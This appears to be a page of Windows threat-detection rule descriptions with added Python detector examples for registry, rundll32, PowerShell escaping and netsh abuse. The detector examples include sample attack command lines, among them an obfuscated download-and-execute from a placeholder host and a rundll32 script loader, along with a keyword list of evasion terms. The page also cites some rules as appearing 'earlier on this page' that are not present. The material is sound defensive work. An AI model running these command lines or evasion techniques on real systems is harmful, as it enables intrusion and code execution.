
Winnti Malware HK University Campaign
level
status test

Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities

Windows Spooler Service Suspicious File Deletion
level
status experimental

Detects DLL deletions from the Spooler Service driver folder

Windows Spooler Service Suspicious Binary Load
level
status experimental

Detects DLL loads from the Spooler Service backup folder

Weak Encryption Enabled and Kerberoast
level
status test

Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.

Wdigest Enable UseLogonCredential
level
status experimental

Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials

Wdigest CredGuard Registry Modification
level
status test

Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.
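
The three registry-based rules above (the DHCP CalloutDlls/CalloutEnabled values, WDigest UseLogonCredential and WDigest IsCredGuardEnabled) and the storage WriteProtect rule earlier on this page share one shape: a Sysmon “registry value set” event (Event ID 13) on a known key with a specific bad value, while the same key written with the hardening value must not alert. The following is an added example, not code from the original page or from the Sigma project, that expresses those indicators as a small table and runs it over constructed Sysmon events. It assumes Sysmon's rendering of REG_DWORD data as `DWORD (0x00000001)` in the Details field; the sample paths and the `C:\ProgramData\callout.dll` value are made up.

```python
import re
from typing import Callable, List, NamedTuple, Optional, Tuple

# Sysmon renders REG_DWORD values in the Details field as "DWORD (0x00000001)".
_DWORD = re.compile(r"DWORD\s*\((0x[0-9A-Fa-f]+)\)")


def dword(details: str) -> Optional[int]:
    """Integer value of a Sysmon DWORD Details string, or None for other value types."""
    m = _DWORD.search(details)
    return int(m.group(1), 16) if m else None


class Indicator(NamedTuple):
    name: str
    key_suffix: str                    # compared case-insensitively with the end of TargetObject
    bad_value: Callable[[str], bool]   # predicate over the Details field


INDICATORS: List[Indicator] = [
    Indicator("WDigest clear-text credential caching enabled",
              r"\Control\SecurityProviders\WDigest\UseLogonCredential", lambda d: dword(d) == 1),
    Indicator("WDigest Credential Guard flag cleared",
              r"\Control\SecurityProviders\WDigest\IsCredGuardEnabled", lambda d: dword(d) == 0),
    Indicator("DHCP server callout DLL configured",
              r"\Services\DHCPServer\Parameters\CalloutDlls", lambda d: d.strip() != ""),
    Indicator("DHCP server callout DLL loading enabled",
              r"\Services\DHCPServer\Parameters\CalloutEnabled", lambda d: dword(d) == 1),
    Indicator("Storage write protection disabled",
              r"\Control\StorageDevicePolicies\WriteProtect", lambda d: dword(d) == 0),
]


def match_registry_event(event: dict) -> Optional[str]:
    """Return the indicator name for a Sysmon Event ID 13 (value set) record, or None."""
    if event.get("EventID") != 13:
        return None
    target = event.get("TargetObject", "").lower()
    details = event.get("Details", "")
    for ind in INDICATORS:
        if target.endswith(ind.key_suffix.lower()) and ind.bad_value(details):
            return ind.name
    return None


# Constructed Sysmon registry events (not from the original page). Paths and the
# "C:\ProgramData\callout.dll" value are made-up sample data.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",   # hardening to 0: not an alert
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\IsCredGuardEnabled",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\DHCPServer\Parameters\CalloutDlls",
     "Details": r"C:\ProgramData\callout.dll"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\DHCPServer\Parameters\CalloutEnabled",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\StorageDevicePolicies\WriteProtect",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 12, "Image": r"C:\Windows\System32\reg.exe",   # key creation only, no value
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest",
     "Details": ""},
]


def scan(events: List[dict]) -> List[Tuple[str, str]]:
    """(indicator, writing image) for every event that matches an indicator."""
    hits = []
    for e in events:
        name = match_registry_event(e)
        if name:
            hits.append((name, e.get("Image", "")))
    return hits
```

Matching on the value rather than only on the key is what keeps a GPO that enforces `UseLogonCredential = 0` from paging the on-call engineer. Sysmon only records these events for keys listed in its configuration, so the `RegistryEvent` section of the config must include the WDigest, DHCPServer and StorageDevicePolicies paths for this logic to see anything.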

Visual Basic Command Line Compiler Usage
level
status test

Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.

Verclsid.exe Runs COM Object
level
status test

Detects when verclsid.exe is used to run COM object via GUID

Using SettingSyncHost.exe as LOLBin
level
status test

Detects using SettingSyncHost.exe to run hijacked binary

Using AppVLP To Circumvent ASR File Path Rule
level
status experimental

The Application Virtualization Utility (AppVLP) is included with Microsoft Office and can be abused to execute shell commands. Normally this binary is used for Application Virtualization, but it can be used to circumvent the ASR file path rule for a folder or to mark a file as a system file.

Uninstall Crowdstrike Falcon
level
status experimental

Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon

Unauthorized System Time Modification
level
status test

Detect scenarios where a potentially unauthorized application or user is modifying the system time.

UAC Bypass With Fake DLL
level
status experimental

Attempts to load dismcore.dll after dropping it

UAC Bypass Via Wsreset
level
status test

Detects an unfixed UAC bypass method on Windows 10. WSReset.exe is associated with the Windows Store; it will run a binary referenced from a registry key that low-privileged users can write.

Turla ComRAT
level
status test

Detects Turla ComRAT patterns

Time Travel Debugging Utility Usage
level
status experimental

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

Telegram API Access
level
status test

Detects suspicious requests to Telegram API without the usual Telegram User-Agent

Tamper Windows Defender
level
status experimental

Detects attempts to disable scheduled scanning and other parts of Windows Defender ATP.

Sysmon Channel Reference Deletion
level
status test

Detects potential threat-actor tampering with the Sysmon manifest, which eventually disables it

Sysinternals SDelete Registry Keys
level
status experimental

A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.

Sysinternals SDelete File Deletion
level
status test

A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.

SyncAppvPublishingServer Execution to Bypass Powershell Restriction
level
status deprecated

Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.

Suspicious ZipExec Execution
level
status experimental

Detects execution of ZipExec, a proof-of-concept (PoC) tool that wraps binary-based tools into a password-protected zip file.

Suspicious VBoxDrvInst.exe Parameters
level
status test

Detects VBoxDrvInst.exe run with parameters that allow processing an INF file. This allows creating values in the registry and installing drivers. For example, one could use this technique to obtain persistence by modifying one of the Run or RunOnce registry keys

Suspicious Usage of the Manage-bde.wsf Script
level
status experimental

Detects usage of the manage-bde.wsf script that may indicate an attempt at proxy execution from a script

Suspicious Task Added by Powershell
level
status experimental

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model

Suspicious Task Added by Bitsadmin
level
status experimental

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model

Suspicious Service Installed
level
status test

Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)

Suspicious Service Binary Directory
level
status experimental

Detects a service binary running in a suspicious directory

Suspicious Runscripthelper.exe
level
status test

Detects execution of powershell scripts via Runscripthelper.exe

Suspicious Rundll32 Without Any CommandLine Params
level
status experimental

Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity

Suspicious Rundll32 Setupapi.dll Activity
level
status test

The setupapi.dll library provides the InstallHinfSection function for processing INF files. An INF file may contain instructions that create values in the registry, modify files and install drivers. This technique could be used to obtain persistence by modifying one of the Run or RunOnce registry keys, to run a process, or to chain calls to other DLLs (see references). The InstallHinfSection function in setupapi.dll calls the runonce.exe executable regardless of the actual content of the INF file.

Suspicious Rundll32 Script in CommandLine
level
status experimental

Detects suspicious process related to rundll32 based on arguments

Suspicious Rundll32 Invoking Inline VBScript
level
status experimental

Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452

Suspicious Rundll32 Activity Invoking Sys File
level
status experimental

Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
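
The rundll32 rules above (no arguments at all, setupapi.dll,InstallHinfSection, inline VBScript/JavaScript, a *.sys file as the module) all reduce to parsing the `<module>,<EntryPoint> [args]` convention rundll32 expects and checking the parts. The following is an added example, not code from the original page or from the Sigma project, that does that parsing once and returns the applicable findings for a command line; the sample command lines are constructed, and the `.sys` path, INF path and URL in them are made up.

```python
import re
from typing import List, Optional, Tuple

_TOKEN = re.compile(r'(?:"[^"]*"|\S)+')   # whitespace-split, but keep quoted runs together


def _tokens(cmdline: str) -> List[str]:
    return _TOKEN.findall(cmdline)


def _image_name(path: str) -> str:
    return path.strip('"').lower().split("\\")[-1]


def parse_rundll32(cmdline: str) -> Optional[Tuple[str, str, List[str]]]:
    """Split a rundll32 command line into (module, entry point, remaining arguments).

    rundll32 expects "<module>,<EntryPoint> [args]"; returns None for other programs
    and empty strings when rundll32 was started with no arguments at all.
    """
    toks = _tokens(cmdline)
    if not toks or _image_name(toks[0]) not in ("rundll32", "rundll32.exe"):
        return None
    if len(toks) == 1:
        return "", "", []
    module, _, entry = toks[1].partition(",")
    return module.strip('"'), entry.strip('"'), toks[2:]


NO_ARGS = "rundll32 started without any arguments"
INLINE_SCRIPT = "inline javascript:/vbscript: in command line"
SYS_MODULE = "driver (.sys) file passed as module"
INF_INSTALL = "INF processing via setupapi.dll,InstallHinfSection"


def analyze_rundll32(cmdline: str) -> List[str]:
    """Return the list of rundll32 anomalies present in one process-creation command line."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return []
    module, entry, _args = parsed
    findings: List[str] = []
    if not module:
        findings.append(NO_ARGS)
    if re.search(r"\b(?:javascript|vbscript):", cmdline, re.IGNORECASE):
        findings.append(INLINE_SCRIPT)
    if module.lower().endswith(".sys"):
        findings.append(SYS_MODULE)
    if _image_name(module) == "setupapi.dll" and entry.lower() == "installhinfsection":
        findings.append(INF_INSTALL)
    return findings


# Constructed sample process-creation command lines (not from the original page).
SAMPLE_CMDLINES = [
    r"rundll32.exe",
    r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://example.invalid/a.sct")',
    r'rundll32.exe vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)',
    r"rundll32.exe C:\Windows\Temp\update.sys,Start",
    r"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Users\Public\setup.inf",
    r'rundll32.exe "C:\Program Files\Vendor\lib.dll",Entry /quiet',
]


def scan(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Command lines that produced at least one finding, with their findings."""
    return [(c, f) for c in cmdlines for f in [analyze_rundll32(c)] if f]
```

Keeping the quoted path together in the tokenizer matters: a module under `C:\Program Files\` would otherwise be split at the space and the entry point lost. The no-argument case is deliberately reported on its own, since a beacon that spawns `rundll32.exe` as a sacrificial host for injection has nothing else on its command line.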

Suspicious Registration via cscript.exe
level
status experimental

Detects the registration of a VSS/VDS provider as a COM+ application.

Suspicious PROCEXP152.sys File Created In TMP
level
status test

Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.

Suspicious PowerShell Command Line
level
status test

Detects the PowerShell command lines with special characters

Suspicious PowerShell Cmdline
level
status test

Detects the PowerShell command lines with reversed strings

Suspicious Parent of Csc.exe
level
status test

Detects a suspicious parent of csc.exe, which could be a sign of payload delivery

Suspicious OfflineScannerShell.exe Execution From Another Folder
level
status experimental

Detects use of OfflineScannerShell.exe from a folder other than its default, which makes it load an mpclient.dll library from the current working directory

Suspicious Ntdll Pipe Redirection
level
status experimental

Detects commands that type the content of ntdll.dll into a different file or a pipe in order to evade AV/EDR detection

Suspicious Mount-DiskImage
level
status experimental

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

Suspicious Load of Advapi31.dll
level
status experimental

Detects the load of advapi31.dll by a process running in an uncommon folder

Suspicious IO.FileStream
level
status experimental

Detects opening a handle on the drive volume via the \\.\ DOS device path specifier and a direct-access read of the first few bytes of the volume.

Suspicious Invoke-Item From Mount-DiskImage
level
status experimental

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

Suspicious GUP Usage
level
status test

Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks

Suspicious ftp.exe
level
status test

Detects renamed ftp.exe, ftp.exe script execution and child processes ran by ftp.exe

Suspicious Eventlog Clear or Configuration Using Wevtutil
level
status test

Detects clearing or configuration of event logs using wevtutil, PowerShell and WMIC. Might be used by ransomware during the attack (as seen with NotPetya and others).

Suspicious Esentutl Use
level
status deprecated

Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.

Suspicious Driver Loaded By User
level
status test

Detects the loading of drivers via ‘SeLoadDriverPrivilege’, which is required to load or unload a device driver. With this privilege, a user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and the processes that are allowed to do so, you may be left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) as well as the usage of Sysinternals and various other tools, so you have to work with a whitelist to find the bad stuff.

Suspicious Download File Extension with Bits
level
status experimental

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model

Suspicious Desktopimgdownldr Target File
level
status test

Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension

Suspicious Copy From or To System32
level
status test

Detects a suspicious copy command that copies a system program from System32 to another directory on disk, sometimes used to move LOLBINs like certutil or desktopimgdownldr to a different location under a different name

Suspicious Calculator Usage
level
status test

Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion

Suspicious Auditpol Usage
level
status experimental

Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

Suspicious Atbroker Execution
level
status experimental

Detects Atbroker executing non-default Assistive Technology applications

Suspect Svchost Memory Access
level
status experimental

Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.

Suspicious CLR Logs Creation
level
status experimental

Detects suspicious .NET assembly executions. Could detect use of Cobalt Strike’s execute-assembly command.

Stop Or Remove Antivirus Service
level
status experimental

Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service

Squirrel Lolbin
level
status experimental

Detects Possible Squirrel Packages Manager as Lolbin

SQL Client Tools PowerShell Session Detection
level
status test

This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

ShimCache Flush
level
status experimental

Detects actions that clear the local ShimCache and remove forensic evidence

Shadow Copies Deletion Using Operating Systems Utilities
level
status stable

Shadow Copies deletion using operating systems utilities

Set Windows System File with Attrib
level
status experimental

Detects marking a file as a system file using the attrib.exe utility

Run PowerShell Script from Redirected Input Stream
level
status test

Detects PowerShell script execution via input stream redirect

Run PowerShell Script from ADS
level
status test

Detects PowerShell script execution from Alternate Data Stream (ADS)

Run Once Task Execution as Configured in Registry
level
status test

This rule detects the execution of Run Once task as configured in the registry

Run Once Task Configuration in Registry
level
status test

Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup

Root Certificate Installed
level
status experimental

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Renamed PAExec
level
status experimental

Detects suspicious renamed PAExec execution as often used by attackers

Renamed MegaSync
level
status experimental

Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.

Renamed jusched.exe
level
status test

Detects renamed jusched.exe used by cobalt group

Remove Windows Defender Definition Files
level
status experimental

Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files

Removal of Potential COM Hijacking Registry Keys
level
status test

A General detection to trigger for processes removing .*\shell\open\command registry keys. Registry keys that might have been used for COM hijacking activities.

Removal Amsi Provider Reg Key
level
status experimental

Detects removal of the AMSI provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection

Remote Registry Management Using Reg Utility
level
status test

Detects remote registry management using the REG utility from a non-admin workstation

Remote Code Execute via Winrm.vbs
level
status test

Detects an attempt to execute code or create service on remote host via winrm.vbs.

RedMimicry Winnti Playbook Registry Manipulation
level
status test

Detects actions caused by the RedMimicry Winnti playbook

RedMimicry Winnti Playbook Execute
level
status test

Detects actions caused by the RedMimicry Winnti playbook

RedMimicry Winnti Playbook Dropped File
level
status test

Detects actions caused by the RedMimicry Winnti playbook

RdrLeakDiag Process Dump
level
status experimental

Detects uses of the rdrleakdiag.exe LOLBIN utility to dump process memory

RDP Sensitive Settings Changed
level
status test

Detects changes to RDP terminal service sensitive settings

Raw Paste Service Access
level
status test

Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form

Raw Disk Access Using Illegitimate Tools
level
status test

Detects raw disk access using illegitimate tools, possible defence evasion

Raccine Uninstall
level
status experimental

Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.

Proxy Execution Via Explorer.exe
level
status test

Attackers can use explorer.exe for evading defense mechanisms

Process Dump via Comsvcs DLL
level
status test

Detects process memory dump via comsvcs.dll and rundll32

Powershell Used To Disable Windows Defender AV Security Monitoring
level
status experimental

Detects attackers attempting to disable Windows Defender using Powershell

Powershell Timestomp
level
status experimental

Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.

Powershell Store File In Alternate Data Stream
level
status experimental

Detects storing files in an Alternate Data Stream (ADS) similar to the Astaroth malware.

PowerShell Encoded Character Syntax
level
status test

Detects suspicious encoded character syntax often used for defense evasion
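
The escape-based evasions on this page (“Suspicious Commandline Escape” earlier, and the encoded character syntax here) work because each shell strips its own escape layer before the command runs: cmd.exe removes `^`, PowerShell removes a backtick in front of an ordinary character, and `[char]105+[char]101+[char]120` builds the string `iex` at run time. A detector that undoes those layers sees what the shell saw. The following is an added example, not code from the original page or from the Sigma project, that normalises a command line and alerts either when the escape count is high or when a keyword appears only after normalisation; the keyword list and the threshold are assumptions, and the sample command lines are constructed.

```python
import re
from typing import Dict, List, Tuple

# Keywords worth knowing about; one that only appears after normalisation was
# deliberately hidden. Assumed list, not the page's rule logic.
KEYWORDS = ("powershell", "cmd", "iex", "invoke-expression", "downloadstring",
            "frombase64string", "rundll32", "mshta", "regsvr32", "certutil")

PS_ESCAPES = set("0abefnrtv")   # `n, `t, ... carry meaning inside double quotes; keep them


def strip_cmd_carets(s: str) -> Tuple[str, int]:
    """Undo cmd.exe caret escaping: ^x -> x (so ^^ -> ^). Returns (text, carets removed)."""
    out: List[str] = []
    i = n = 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
            n += 1
        else:
            out.append(s[i])
            i += 1
    return "".join(out), n


def strip_ps_backticks(s: str) -> Tuple[str, int]:
    """Undo PowerShell backtick escaping of ordinary characters: I`E`X -> IEX."""
    out: List[str] = []
    i = n = 0
    while i < len(s):
        if s[i] == "`" and i + 1 < len(s) and s[i + 1] not in PS_ESCAPES:
            out.append(s[i + 1])
            i += 2
            n += 1
        else:
            out.append(s[i])
            i += 1
    return "".join(out), n


_CHAR = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
_CHAIN = re.compile(r"\[char\]\s*(?:0x[0-9a-f]+|\d+)(?:\s*\+\s*\[char\]\s*(?:0x[0-9a-f]+|\d+))*",
                    re.IGNORECASE)


def decode_char_chains(s: str) -> Tuple[str, int]:
    """Replace [char]105+[char]101+[char]120 style chains with the literal string they build."""
    n = 0

    def repl(m: "re.Match[str]") -> str:
        nonlocal n
        codes = [int(c, 16) if c.lower().startswith("0x") else int(c)
                 for c in _CHAR.findall(m.group(0))]
        n += len(codes)
        return '"' + "".join(chr(c) for c in codes) + '"'

    return _CHAIN.sub(repl, s), n


def normalize(cmdline: str) -> Tuple[str, Dict[str, object]]:
    """Strip the escape layers in the order the shells apply them and report what was removed."""
    text, carets = strip_cmd_carets(cmdline)
    text, backticks = strip_ps_backticks(text)
    text, chars = decode_char_chains(text)
    revealed = [k for k in KEYWORDS if k in text.lower() and k not in cmdline.lower()]
    return text, {"carets": carets, "backticks": backticks, "chars": chars, "revealed": revealed}


def is_suspicious(cmdline: str, threshold: int = 3) -> bool:
    """Alert when escaping is heavy or when normalisation uncovers a hidden keyword."""
    _, stats = normalize(cmdline)
    score = stats["carets"] + stats["backticks"] + stats["chars"]
    return score >= threshold or bool(stats["revealed"])


# Constructed sample command lines (not from the original page).
SAMPLE_CMDLINES = [
    r'''c^m^d /c p^o^w^e^r^s^h^e^l^l -nop -w hidden -c "I`E`X (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"''',
    r'''powershell -c "$f=([char]105+[char]101+[char]120); & $f 'Get-Date'"''',
    r'''powershell -nop -c "Get-Process | Select-Object -First 5"''',
    r'''echo ^<html^> > page.html''',   # a single benign caret escape
]
```

The last sample is the caveat: legitimate batch files escape `<` and `>` with carets all the time, which is why the count alone is not the verdict and the “revealed keyword” test carries most of the weight. The `[char]` decoder only handles the `+`-joined form; `-join` and `[string]` casts would need their own patterns.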

Powershell Detect Virtualization Environment
level
status experimental

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox

PowerShell Deleted Mounted Share
level
status experimental

Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

Powershell Defender Exclusion
level
status experimental

Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets

Powershell Defender Disable Scan Feature
level
status experimental

Detects requests to disable Microsoft Defender features using PowerShell commands

Powershell Defender Base64 MpPreference
level
status experimental

Detects base64 encoded PowerShell code that modifies Windows Defender

PowerShell Called from an Executable Version Mismatch
level
status experimental

Detects PowerShell called from an executable by the version mismatch method

Possible Ransomware or Unauthorized MBR Modifications
level
status experimental

Detects possibly malicious, unauthorized usage of bcdedit.exe

Possible Process Hollowing Image Loading
level
status test

Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz

PortProxy Registry Key
level
status experimental

Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.

Office Security Settings Changed
level
status experimental

Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)

Non-privileged Usage of Reg or Powershell
level
status test

Searches for usage of reg or PowerShell by non-privileged users to modify service configuration in the registry

Netsh RDP Port Opening
level
status test

Detects netsh commands that open port 3389 used for RDP, as used by the Sarwent malware

Netsh RDP Port Forwarding
level
status test

Detects netsh commands that configure a port forwarding of port 3389 used for RDP

Netsh Port or Application Allowed
level
status test

Detects allowing incoming connections by port or application on the Windows Firewall

Netsh Port Forwarding
level
status experimental

Detects netsh commands that configure a port forwarding (PortProxy)
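
The four netsh rules above (RDP port opening, RDP port forwarding, port or application allowed, generic PortProxy) differ only in which netsh context is invoked and which `key=value` switches appear. The following is an added example, not code from the original page or from the Sigma project, that parses the `advfirewall firewall add rule`, `interface portproxy add` and legacy `firewall add portopening` / `add allowedprogram` forms and reports both the generic finding and the RDP-specific one; the sample command lines, addresses and program path are constructed.

```python
import re
from typing import Dict, List

RDP_PORT = 3389
_TOKEN = re.compile(r'(?:"[^"]*"|\S)+')


def _tokens(cmdline: str) -> List[str]:
    return _TOKEN.findall(cmdline)


def _kv(tokens: List[str]) -> Dict[str, str]:
    """key=value switches as used by netsh advfirewall/portproxy (quotes removed)."""
    out: Dict[str, str] = {}
    for t in tokens:
        if "=" in t:
            k, v = t.split("=", 1)
            out[k.lower()] = v.strip('"')
    return out


def port_listed(spec: str, port: int) -> bool:
    """True if a netsh port spec ("3389", "3380-3390", "80,3389", "any") covers port."""
    spec = spec.lower().strip()
    if spec == "any":
        return True
    for item in spec.split(","):
        lo, _, hi = item.partition("-")
        try:
            if int(lo) <= port <= int(hi or lo):
                return True
        except ValueError:
            continue
    return False


def analyze_netsh(cmdline: str) -> List[str]:
    """Findings for one netsh command line; an empty list means nothing of interest."""
    toks = _tokens(cmdline)
    if not toks or toks[0].strip('"').lower().split("\\")[-1] not in ("netsh", "netsh.exe"):
        return []
    low = [t.lower() for t in toks]
    kv = _kv(toks)
    findings: List[str] = []

    # netsh interface portproxy add v4tov4 listenport=.. connectaddress=.. connectport=..
    if "portproxy" in low and "add" in low:
        findings.append(f"portproxy added: listen {kv.get('listenport')} -> "
                        f"{kv.get('connectaddress')}:{kv.get('connectport')}")
        if str(RDP_PORT) in (kv.get("listenport"), kv.get("connectport")):
            findings.append(f"RDP port forwarding ({RDP_PORT})")

    # netsh advfirewall firewall add rule ... dir=in action=allow localport=.. | program=..
    if ("advfirewall" in low and "add" in low
            and kv.get("action", "").lower() == "allow" and kv.get("dir", "").lower() == "in"):
        if "localport" in kv:
            findings.append(f"inbound allow rule for port(s) {kv['localport']}")
            if port_listed(kv["localport"], RDP_PORT):
                findings.append(f"RDP port opened ({RDP_PORT})")
        if "program" in kv:
            findings.append(f"inbound allow rule for program {kv['program']}")

    # legacy: netsh firewall add portopening <proto> <port> <name> | add allowedprogram <path> <name>
    if "firewall" in low and "advfirewall" not in low and "add" in low:
        if "portopening" in low:
            i = low.index("portopening")
            port = next((t for t in toks[i + 1:] if t.isdigit()), None)
            findings.append(f"legacy firewall port opening {port}")
            if port == str(RDP_PORT):
                findings.append(f"RDP port opened ({RDP_PORT})")
        if "allowedprogram" in low:
            i = low.index("allowedprogram")
            prog = toks[i + 1].strip('"') if len(toks) > i + 1 else "?"
            findings.append(f"legacy firewall allowed program {prog}")
    return findings


# Constructed sample command lines (not from the original page).
SAMPLE_CMDLINES = [
    "netsh interface portproxy add v4tov4 listenport=3389 listenaddress=0.0.0.0 connectport=3389 connectaddress=10.0.0.5",
    "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=10.0.0.7",
    'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389',
    r'netsh advfirewall firewall add rule name="Updater" dir=in action=allow program="C:\Users\Public\updater.exe" enable=yes',
    "netsh firewall add portopening TCP 3389 RemoteDesktop ENABLE",
    "netsh advfirewall firewall add rule name=BlockSMB dir=in action=block protocol=TCP localport=445",
    "netsh interface portproxy show all",
]
```

`port_listed` matters for the firewall case because `localport=3380-3390` or `localport=any` opens RDP just as effectively as `localport=3389`; a plain substring match on `3389` misses both. Block rules and `show` commands produce no findings, which keeps administrative inventory scripts quiet.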

Netsh Allow Group Policy on Microsoft Defender Firewall
level
status experimental

Adversaries may modify system firewalls in order to bypass controls limiting network usage

Mshta Spawning Windows Shell
level
status experimental

Detects a suspicious child process of a mshta.exe process

Mounted Share Deleted
level
status test

Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

Monitoring Wuauclt.exe For Lolbas Execution Of DLL
level
status experimental

Adversaries can abuse wuauclt.exe (Windows Update client) to execute code by specifying an arbitrary DLL.

Monitoring Winget For LOLbin Execution
level
status experimental

Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 Insider programs. The manifest option lets you install an application by passing a YAML file directly to the client. Winget can then be used to download and install .exe, .msi and .msix files.

Monitoring For Persistence Via BITS
level
status experimental

BITS allows you to schedule a command that executes after a successful download, to notify you that the job is finished. When the job runs on the system, the command specified in the BITS job is executed. This can be abused by actors to create a backdoor on the system and for persistence: the download of malware/additional binaries is chained in a BITS job, and the program is executed after being downloaded.
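
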